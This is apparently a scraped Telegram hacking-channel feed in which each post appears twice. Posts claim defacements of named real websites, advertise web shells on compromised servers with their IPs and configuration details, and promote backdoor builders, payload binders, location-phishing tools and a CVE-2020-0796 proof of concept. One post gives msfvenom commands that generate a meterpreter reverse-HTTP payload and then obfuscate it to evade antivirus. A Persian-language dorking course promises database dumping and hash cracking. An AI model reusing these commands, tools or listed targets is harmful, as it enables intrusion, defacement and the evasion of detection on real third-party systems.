Site:
http://climasist.com.br
http://civ.vn
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸 🇳🇦
#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
http://climasist.com.br
http://civ.vn
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸 🇳🇦
#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
❤2
PHP: 7.4.33
Safe Mode: OFF
ServerIP: 103.159.51.253 🇳🇦
HDD: Total:14.64 GB
Free:1.25 GB [8%]
useful:--------------
Downloader: --------------
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : OFF
SoftWare: nginx/1.21.0
🔗 Link
Enjoy... ⭐️
#Shell
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Safe Mode: OFF
ServerIP: 103.159.51.253 🇳🇦
HDD: Total:14.64 GB
Free:1.25 GB [8%]
useful:--------------
Downloader: --------------
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : OFF
SoftWare: nginx/1.21.0
🔗 Link
Enjoy... ⭐️
#Shell
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
👍2
A Tool With Attractive Capabilities.
Features:
⚪️ Obtain Device Information Without Any Permission !
⚪️ Access Location [SMARTPHONES]
⚪️ Access Webcam
⚪️ Access Microphone
GitHub
#Python #social_engineering_attacks #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Features:
⚪️ Obtain Device Information Without Any Permission !
⚪️ Access Location [SMARTPHONES]
⚪️ Access Webcam
⚪️ Access Microphone
GitHub
#Python #social_engineering_attacks #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
⚡2
A Massive Exploiting Tool
TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus
Features !
⚪️ Fully Automating MSFvenom & Metasploit.
⚪️ Local or remote listener Generation.
⚪️ Easily Make Backdoor by category Operating System.
⚪️ Generate payloads in Various formats.
⚪️ Bypass anti-virus backdoors.
⚪️ File pumper that you can use for increasing the size of your files.
⚪️ The ability to detect external IP & Interface address .
⚪️ Automatically creates AutoRun files for USB / CDROM exploitation
GitHub
#C #Rat #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus
Features !
⚪️ Fully Automating MSFvenom & Metasploit.
⚪️ Local or remote listener Generation.
⚪️ Easily Make Backdoor by category Operating System.
⚪️ Generate payloads in Various formats.
⚪️ Bypass anti-virus backdoors.
⚪️ File pumper that you can use for increasing the size of your files.
⚪️ The ability to detect external IP & Interface address .
⚪️ Automatically creates AutoRun files for USB / CDROM exploitation
GitHub
#C #Rat #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
🔥1
Python Obfuscator for FUD Python Code.
Example: Creating FUD Meterpreter Python Payload
1. Generate Python Payload:
msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt
2. Obfuscate Payload
onelinepy -m /one_line/base64 --noscript payload.txt -i 3 --output obfuscated_payload.txt
GitHub
#Python #bypass_antivirus #FUD #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Example: Creating FUD Meterpreter Python Payload
1. Generate Python Payload:
msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt
2. Obfuscate Payload
onelinepy -m /one_line/base64 --noscript payload.txt -i 3 --output obfuscated_payload.txt
GitHub
#Python #bypass_antivirus #FUD #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
PHP: 7.4.33
Safe Mode: OFF
ServerIP: 208.109.68.144 🇺🇸
HDD: Total:1007.81 GB
Free:741.34 GB [73%]
Useful : gcc cc ld make php perl python ruby tar gzip
Downloader: wget lynx curl
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
SoftWare: Apache
🔗 Link
#Shell
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Safe Mode: OFF
ServerIP: 208.109.68.144 🇺🇸
HDD: Total:1007.81 GB
Free:741.34 GB [73%]
Useful : gcc cc ld make php perl python ruby tar gzip
Downloader: wget lynx curl
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
SoftWare: Apache
🔗 Link
#Shell
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2020-0796 Remote overflow POC
CVE-2020–0796, is pre-remote code execution vulnerability that resides in the Server Message Block 3.0 (SMBv3) network communication protocol
Which devices does the CVE-2020-0796 affect?
+ Windows 10 Version 1903 for 32-bit Systems
+ Windows 10 Version 1903 for ARM64-based Systems
+ Windows 10 Version 1903 for x64-based Systems
+ Windows 10 Version 1909 for 32-bit Systems
+ Windows 10 Version 1909 for ARM64-based Systems
+ Windows 10 Version 1909 for x64-based Systems
+ Windows Server, version 1903 (Server Core installation)
+ Windows Server, version 1909 (Server Core installation)
GitHub
GitHub
#CVE #Microsoft #POC
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
CVE-2020–0796, is pre-remote code execution vulnerability that resides in the Server Message Block 3.0 (SMBv3) network communication protocol
Which devices does the CVE-2020-0796 affect?
+ Windows 10 Version 1903 for 32-bit Systems
+ Windows 10 Version 1903 for ARM64-based Systems
+ Windows 10 Version 1903 for x64-based Systems
+ Windows 10 Version 1909 for 32-bit Systems
+ Windows 10 Version 1909 for ARM64-based Systems
+ Windows 10 Version 1909 for x64-based Systems
+ Windows Server, version 1903 (Server Core installation)
+ Windows Server, version 1909 (Server Core installation)
GitHub
GitHub
#CVE #Microsoft #POC
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
A powerful tool to bind payloads to any files
Download
#Binder #Payloads #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Download
#Binder #Payloads #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
SEEKER
A good tool to identify and get a quick information from the user
Concept behind Seeker is simple, just like we host phishing pages to get credentials why not host a fake page that requests your location like many popular location based websites
GitHub
#System_Information #GeoLocation #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
A good tool to identify and get a quick information from the user
Concept behind Seeker is simple, just like we host phishing pages to get credentials why not host a fake page that requests your location like many popular location based websites
GitHub
#System_Information #GeoLocation #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
👍1
Site:
http://www.gokcevizyon.com
http://equitylaw.pro
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇷🇺 🇹🇷
Database
#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
http://www.gokcevizyon.com
http://equitylaw.pro
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇷🇺 🇹🇷
Database
#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
👍1
PHP: 5.6.36
Safe Mode: OFF
ServerIP: 2a00:f940:2:2:1:4:0:93 🇷🇺
HDD: Total:3475.35 GB
Free:667.08 GB [19%]
Useful : gcc cc ld make php perl python ruby tar gz ip nc
Downloader: wget links curll wp-mirror
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Safe Mode: OFF
ServerIP: 2a00:f940:2:2:1:4:0:93 🇷🇺
HDD: Total:3475.35 GB
Free:667.08 GB [19%]
Useful : gcc cc ld make php perl python ruby tar gz ip nc
Downloader: wget links curll wp-mirror
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
eDEX-UI is a fullscreen, cross-platform terminal emulator and system monitor that looks and feels like a sci-fi computer interface.
Features:
⚪️ Fully featured terminal emulator with tabs, colors, mouse events, and support for
⚪️ Real-time system (CPU, RAM, swap, processes) and network (GeoIP, active connections, transfer rates) monitoring.
⚪️ Full support for touch-enabled displays, including an on-screen keyboard.
⚪️ Directory viewer that follows the CWD (current working directory) of the terminal.
⚪️ Advanced customization using themes, on-screen keyboard layouts, CSS injections. See the wiki for more info.
⚪️ Optional sound effects made by a talented sound designer for maximum hollywood hacking vibe.
GitHub
#Edex_UI #Desktop #Windows #Linux
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Features:
⚪️ Fully featured terminal emulator with tabs, colors, mouse events, and support for
curses and curses-like applications.⚪️ Real-time system (CPU, RAM, swap, processes) and network (GeoIP, active connections, transfer rates) monitoring.
⚪️ Full support for touch-enabled displays, including an on-screen keyboard.
⚪️ Directory viewer that follows the CWD (current working directory) of the terminal.
⚪️ Advanced customization using themes, on-screen keyboard layouts, CSS injections. See the wiki for more info.
⚪️ Optional sound effects made by a talented sound designer for maximum hollywood hacking vibe.
GitHub
#Edex_UI #Desktop #Windows #Linux
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
⚡1
دوره دورک نویسی حرفه ای
دورک (Dork) یا Google Dork در واقع به معنی افشای اطلاعات ناخواسته امنیتی در اینترنت می باشد که توسط موتورهای جستجو انجام می شود. در واقع می توان از Dorkبه عنوان نتیجه Google Hacking نام برد ، وقتی یک نفوذگر با استفاده از Google Hacking آسیب پذیری را پیدا می کند می تواند جستجویی که انجام داده را در اینترنت برای استفاده دیگران قرار بدهد و آسیب پذیری های سایر وب سایت ها را نیز شناسایی کند.
دورک(Dork) از آن دسته مباحثی است که در حوزه امنیت جایگاه خاصی را به خود اختصاص داده است.برای به دست آوردن دیتابیس و یا برای پیدا کردن تارگت ، بدون شک به دورک نویسی حرفه ای نیاز داریم.
در این دوره آموزشی نکات ریز کار را در مدت زمان کوتاه به شما عزیزان ارائه می کنیم.
۱. معرفی
۲. نوشتن کلمه کلیدی به روش های مختلف
۳. نکات ریز در استفاده از کلمات کلیدی
۴. ساخت دورک
۵. بیرون کشیدن دیتابیس
۶. کرک هش
Download
#Dork #Google #Google_Hacking
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
دورک (Dork) یا Google Dork در واقع به معنی افشای اطلاعات ناخواسته امنیتی در اینترنت می باشد که توسط موتورهای جستجو انجام می شود. در واقع می توان از Dorkبه عنوان نتیجه Google Hacking نام برد ، وقتی یک نفوذگر با استفاده از Google Hacking آسیب پذیری را پیدا می کند می تواند جستجویی که انجام داده را در اینترنت برای استفاده دیگران قرار بدهد و آسیب پذیری های سایر وب سایت ها را نیز شناسایی کند.
دورک(Dork) از آن دسته مباحثی است که در حوزه امنیت جایگاه خاصی را به خود اختصاص داده است.برای به دست آوردن دیتابیس و یا برای پیدا کردن تارگت ، بدون شک به دورک نویسی حرفه ای نیاز داریم.
در این دوره آموزشی نکات ریز کار را در مدت زمان کوتاه به شما عزیزان ارائه می کنیم.
۱. معرفی
۲. نوشتن کلمه کلیدی به روش های مختلف
۳. نکات ریز در استفاده از کلمات کلیدی
۴. ساخت دورک
۵. بیرون کشیدن دیتابیس
۶. کرک هش
Download
#Dork #Google #Google_Hacking
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
❤1🔥1
Site:
http://3rdleg.co.uk
http://teamsigma.com.br/wp-content/
http://gokcevizyon.com/wp-content/
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇩🇪 🇧🇷 🇹🇷
#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
http://3rdleg.co.uk
http://teamsigma.com.br/wp-content/
http://gokcevizyon.com/wp-content/
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇩🇪 🇧🇷 🇹🇷
#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
🔥2
PHP: 5.2.17
Safe Mode: OFF
ServerIP: 187.17.111.103 [🇧🇷]
HDD: Total:5.00 GB
Free:4.81 GB [96%]
Windows:
Downloader: -------------
CURL : ON | SSH2 : OFF | Magic Quotes : ON | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF
Sole Sad & Invisible
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Microsoft-IIS/10.0
DRIVE: [ a ] [ c ] [ e ] [ j ] [ s ]
🔗 Link
Enjoy... ⭐️
#Shell
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Safe Mode: OFF
ServerIP: 187.17.111.103 [🇧🇷]
HDD: Total:5.00 GB
Free:4.81 GB [96%]
Windows:
Downloader: -------------
CURL : ON | SSH2 : OFF | Magic Quotes : ON | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF
Sole Sad & Invisible
Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE
SoftWare: Microsoft-IIS/10.0
DRIVE: [ a ] [ c ] [ e ] [ j ] [ s ]
🔗 Link
Enjoy... ⭐️
#Shell
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
😢1
Apktool
It is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with app easier because of project-like files structure and automation of some repetitive tasks like building apk, etc.
GitHub
Site
#Androdi #reverse_engineering #APK #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
It is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with app easier because of project-like files structure and automation of some repetitive tasks like building apk, etc.
GitHub
Site
#Androdi #reverse_engineering #APK #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
هزارویک دستور لینوکس
نکته هاي آموزشی سیستم عامل لینوکس
نام کتاب: هزار و یک دستور لینوکس
نویسنده: حسین سیلانی
ویراستار و طراح جلد: ا. قاسمی نژاد
ناشر: نشر آزاد
نوبت چاپ: اول
تاریخ نشر: 1397
شمارگان: 20000 نسخه
قیمت:10000 تومان
شابک: 3-88-6987-756-975
Download
#Book #Linux #Command
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
نکته هاي آموزشی سیستم عامل لینوکس
نام کتاب: هزار و یک دستور لینوکس
نویسنده: حسین سیلانی
ویراستار و طراح جلد: ا. قاسمی نژاد
ناشر: نشر آزاد
نوبت چاپ: اول
تاریخ نشر: 1397
شمارگان: 20000 نسخه
قیمت:10000 تومان
شابک: 3-88-6987-756-975
Download
#Book #Linux #Command
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Nishang
Nishang is a framework and collection of noscripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
GitHub
#PowerShell #Penetration_Testing #RedTeam
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Nishang is a framework and collection of noscripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
GitHub
#PowerShell #Penetration_Testing #RedTeam
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Site:
http://nagpursports.co.in
http://innovastore.cl
http://accessmedigap.com
http://medicarequotestoday.com
http://teach.medicareoffersnow.com
http://netf-lix.medicareoffersnow.com
http://test-05.followmylead.biz
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸 🇨🇱 🇩🇪
#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
http://nagpursports.co.in
http://innovastore.cl
http://accessmedigap.com
http://medicarequotestoday.com
http://teach.medicareoffersnow.com
http://netf-lix.medicareoffersnow.com
http://test-05.followmylead.biz
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸 🇨🇱 🇩🇪
#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
PHP: 7.2.34
Safe Mode: OFF
ServerIP: 148.72.213.228 [🇸🇬]
Domains: 262 Domains
HDD: Total:199.99 GB
Free:9.18 GB [4%]
Useful : gcc cc ld make php perl python tar gzip nc
Downloader: wget lynx links curll wp-mirror
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Safe Mode: OFF
ServerIP: 148.72.213.228 [🇸🇬]
Domains: 262 Domains
HDD: Total:199.99 GB
Free:9.18 GB [4%]
Useful : gcc cc ld make php perl python tar gzip nc
Downloader: wget lynx links curll wp-mirror
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
🤯1
Site:
https://mffproject.com
http://slotpulsa.mffproject.com
http://test.mffproject.com
http://vfe-amzid.mffproject.com
http://vip.mffproject.com
http://wp.mffproject.com
https://aptic.club
https://aptic.club/wp-content
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸 🇫🇷
#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
https://mffproject.com
http://slotpulsa.mffproject.com
http://test.mffproject.com
http://vfe-amzid.mffproject.com
http://vip.mffproject.com
http://wp.mffproject.com
https://aptic.club
https://aptic.club/wp-content
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸 🇫🇷
#Deface
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
🔥4